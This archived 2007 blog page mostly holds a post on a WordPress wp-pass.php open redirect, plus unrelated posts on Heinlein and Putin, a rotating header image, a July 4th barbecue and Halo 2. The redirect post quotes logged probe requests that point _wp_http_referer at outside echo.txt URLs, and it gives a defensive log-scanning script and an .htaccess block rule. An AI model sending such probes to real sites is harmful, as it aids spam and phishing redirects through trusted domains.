Mostly about my amusement

Year: 2007 (page 11 of 18)

.htaccess to prevent wp-pass.php redirects

I was checking out my server logs (gripping reading, could not put it down) when I saw these two entries:

208.78.98.108 - - [09/Jul/2007:20:28:07 -0400] "GET /wp-pass.php?_wp_http_referer=http://topnlpsites.com/images/gif/echo.txt? HTTP/1.1" 403 860 "-" "libwww-perl/5.803"
81.169.188.151 - - [09/Jul/2007:20:54:39 -0400] "GET /wp-pass.php?_wp_http_referer=http://doublezer0.free.fr/echo.txt? HTTP/1.1" 403 1032 "-" "libwww-perl/5.69"

File wp-pass.php? Where’d that come from?

The BUGTRAQ posting explains it: wp-pass.php takes a _wp_http_referer argument and sends the requesting browser to whatever URL that argument points to, without checking that the destination is on the same site. That makes it an open redirect, and a simple script is enough to verify that a WordPress installation is susceptible.

The bad guy sends out spam or a bogus link that points at a WordPress installation, and that blog redirects the request wherever the attacker wants. The victim (and any spam filter) sees a trusted domain in the link, not the attacker's. This is not earth shattering, but it is really annoying.
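As an added example (not code from the original post, from WordPress or from the BUGTRAQ advisory), the script below does two things the post describes in prose: it runs over Apache access-log lines and flags every wp-pass.php request whose _wp_http_referer would send a visitor off the site, and it shows the same-host check that a redirect parameter needs before it is handed to a Location header. The combined log format and the blog hostname example.com are assumptions; the first two sample lines are the ones quoted above, the rest are constructed to show benign uses of the same parameter.

```python
"""
Spot wp-pass.php open-redirect probes in an Apache access log and show the
redirect-target check whose absence the post describes.

Added example: this is not code from the original post, from WordPress or
from the BUGTRAQ advisory. Assumptions: the log is in Apache "combined"
format, and the blog's own hostname is example.com. The first two sample
lines are the ones quoted in the post; the remaining lines are constructed
to show benign uses of the same parameter.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Apache combined log format:
# ip ident user [time] "method target proto" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

OWN_HOST = "example.com"  # assumption: the blog's own hostname

SAMPLE_LOG = """\
208.78.98.108 - - [09/Jul/2007:20:28:07 -0400] "GET /wp-pass.php?_wp_http_referer=http://topnlpsites.com/images/gif/echo.txt? HTTP/1.1" 403 860 "-" "libwww-perl/5.803"
81.169.188.151 - - [09/Jul/2007:20:54:39 -0400] "GET /wp-pass.php?_wp_http_referer=http://doublezer0.free.fr/echo.txt? HTTP/1.1" 403 1032 "-" "libwww-perl/5.69"
192.0.2.10 - - [09/Jul/2007:21:02:11 -0400] "POST /wp-pass.php?_wp_http_referer=/2007/07/some-post/ HTTP/1.1" 302 0 "http://example.com/2007/07/some-post/" "Mozilla/5.0"
192.0.2.11 - - [09/Jul/2007:21:05:42 -0400] "GET /wp-pass.php?_wp_http_referer=http://example.com/about/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.0.2.12 - - [09/Jul/2007:21:07:03 -0400] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""


def is_local_redirect(target: str, own_host: str = OWN_HOST) -> bool:
    """Return True only if following `target` keeps the browser on own_host.

    This is the check a redirect parameter needs before it goes into a
    Location: header. It accepts a single-slash relative path or an
    http(s) URL whose host is exactly own_host, and rejects everything
    else: other hosts, protocol-relative "//host/" forms, "/\\host" forms
    that some browsers normalise to "//host", userinfo tricks such as
    "http://own@evil/", and non-http schemes.
    """
    target = target.strip()
    parts = urlsplit(target)
    if parts.scheme == "" and parts.netloc == "":
        return (
            target.startswith("/")
            and not target.startswith("//")
            and not target.startswith("/\\")
        )
    if parts.scheme not in ("http", "https"):
        return False
    return (parts.hostname or "").lower() == own_host.lower()


def find_redirect_probes(log_text: str, own_host: str = OWN_HOST):
    """Return (ip, status, referer_value) for every wp-pass.php request whose
    _wp_http_referer would send the visitor off own_host."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        url = urlsplit(m.group("target"))
        if not url.path.endswith("/wp-pass.php"):
            continue
        params = parse_qs(url.query, keep_blank_values=True)
        for ref in params.get("_wp_http_referer", []):
            if not is_local_redirect(ref, own_host):
                hits.append((m.group("ip"), int(m.group("status")), ref))
    return hits


if __name__ == "__main__":
    for ip, status, ref in find_redirect_probes(SAMPLE_LOG):
        print(f"{ip} status={status} would redirect to {ref}")
```

Run against the sample, the two libwww-perl probes from the post are reported and the two same-site uses are not. The same-host check is deliberately strict: a hostname comparison against a fixed value, not a prefix or substring match, because "example.com.evil.test" and "http://example.com@evil.test/" both pass the sloppier tests.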

Luckily Apache’s .htaccess is our friend. In my blog root at the end of my .htaccess file I added the following two lines:

RewriteCond %{REQUEST_URI} wp-pass\.php
RewriteRule .* - [F]

I do not have any password protected posts so I don't use that file (which is all I gather it is for…) and after implementing this my blog continues to work fine. Any request that matches that rewrite condition gets a 403 Forbidden. The rule needs mod_rewrite with RewriteEngine On, which WordPress permalinks already rely on, and it matches any path containing wp-pass.php, so it also covers a second WordPress installed under a subdirectory of the same site.

The posting says this is to be fixed in WordPress 2.2.2. It also mentions that wp-includes/pluggable.php and wp-includes/functions.php may be vulnerable because of problematic code.

New Old Russia

When I was in high school I read lots of Robert A. Heinlein. The stories were very "good guy versus bad guys", with the help of a lady who was much smarter than the good guy and knew the real score.

Great stuff, and a collection of his was updated in 1980 to include new material and updates. That collection was called “Expanded Universe”. It's a great look into what people thought in the 40's through the 60's. R.A.H. was a great American patriot, never trusted Communists, and would work hard to put the science into science fiction.

Buy the book or go to the library. Read the short story “Pravda” Means “Truth”. Now go to the New York Times online article titled “Youth Groups Created by Kremlin Serve Putin's Cause”. Here is an excerpt from the beginning of the article.

“Tell me, what achievements of Putin’s policy can you name?” she asked, referring to Russia’s president since 2000, Vladimir V. Putin.

“Well, it’s the stabilization in the economy,” the girl answered. “Pensions were raised.”

“And what’s in Chechnya?” Ms. Kuliyeva asked, probing her knowledge of a separatist conflict that has killed tens of thousands and, although largely won by Russia’s federal forces and Chechen loyalists, continues.

“In Chechnya, it’s that it is considered a part of Russia,” the girl responded.

“Is this war still going on there?”

“No, everything is quiet.”

It's a scary read. In the short story about the Heinleins' trip to Russia, “Pravda” Means “Truth”, they visit a class and see some school kids with their guide. This is the text I typed from the book (page 414 in my copy).

Our guide translated nothing so, superficially, it was the sort of beguiling performance one sees in any American kindergarten.

However, my wife understands Russian:

The poem recounted the life of Lenin.

The prose recitation concerned the Seven-Year Plan.

The group singing was about how “we must protect our Revolution.”

These tots were no older than six.

That is how it is done. Starting at the cradle, never let them hear anything but the official version. Thus “pravda” becomes “truth” to the Russian children.

The Heinleins' trip was in 1960, when the U-2 spy plane made an unscheduled landing. At that time Khrushchev was in charge. Apparently Putin and his pals know full well that the old tricks really do work best.

I’m not sure if the tag Just Stupid should really be replaced with Just Scary.

XHTML and image rotate for the header

I've had some free time, so I went through all my posts (153!) and made sure they validate as XHTML Strict. I've also played with this theme and added an image rotator for the header.

Using Matt's rotate.php script, I created a directory called and dumped some images in there. The images were lifted from Stefan's Flickr page. His pictures are great, and I was already using one of his images as a banner.

In my CSS file I replaced the

#header {
background: url(img/bus.jpg) no-repeat bottom;

with

#header {
background: url(img/rotate.php) no-repeat bottom;

Per the CSS for my header the files should be 700×175, which I forgot, and I created 700×200 images. No big deal; the header has a fixed height, so the CSS simply clips the images to fit.

The fun part was getting around the caching so I could see the files and how they look. Internet Explorer and Firefox cache the page to make the whole experience faster. But that also means that when I reloaded the page the banner would not necessarily change.

Using Google I found that adding the following right below the <head> statement in my header.php would get Internet Explorer and Firefox to reload the whole page with a new banner (most of the time).

<meta http-equiv="Expires" content="Tue, 01 Jan 1980 01:00:00 GMT" />
<meta http-equiv="Pragma" content="no-cache" />

Note that these tags only describe the HTML page. The banner is a separate response from rotate.php, which the browser caches on its own, so if the banner must change on every load the script itself has to send Cache-Control and Expires headers; that is why the meta tags only help most of the time.

I turned it off after my curiosity was satisfied. Caching is your friend and should be respected.

Happy 4th of July

For the 4th, the family went over to Stefan's place for a BBQ. It was raining, but everyone had a good time. We moved the table into the garage and hung out till it got dark.

The garage had no lights so Janny got us candles. A good time was definitely had by all.

Living on Long Island for a couple of years now has spoiled me for Queens. On the next block they were shooting off fireworks and had some guys informally closing the street. I expected someone to call the cops (I'm paranoid that way), but I guess everyone liked it, so it was all cool.

The drive back was fun. Since it was only the four of us, I insisted we take the MINI. That's always a fun car to drive, but it gets a little scary when it starts raining hard. Because of the rain the barge carrying the Jones Beach fireworks was not able to get there, and they had to cancel.

Too bad, a lot of people must have been disappointed.

Completed Halo 2 on Vista

Halo 2 on Vista banner from microsoft.com

That was anticlimactic.

My saved games came back and I was farther along than I thought. After a couple of “boss” battles I completed the game. I actually had to check the Wikipedia page to see if there was something I missed.

It was definitely an “okay” game but nothing to get excited about. After playing Call of Duty 2 (and CoD 3 on the PS3) I have a feeling of “that’s it?”

When Halo 3 comes out I’ll probably get it for the Xbox 360, but Bungie and Microsoft better get some more excitement into the game.

Halo 2 on Vista problems

My installation of Halo 2 on Vista is not working. I get to the part where the Arbiter gets pushed off the ledge when Keyes gets captured, and he loses the icon.

The game complains about needing the DVD; I insert it and have to repeat the whole level. Twice. I'm taking a break, but that is really a pain in the ass. I may reinstall it and see if that fixes the problem.

So far the game is “okay”.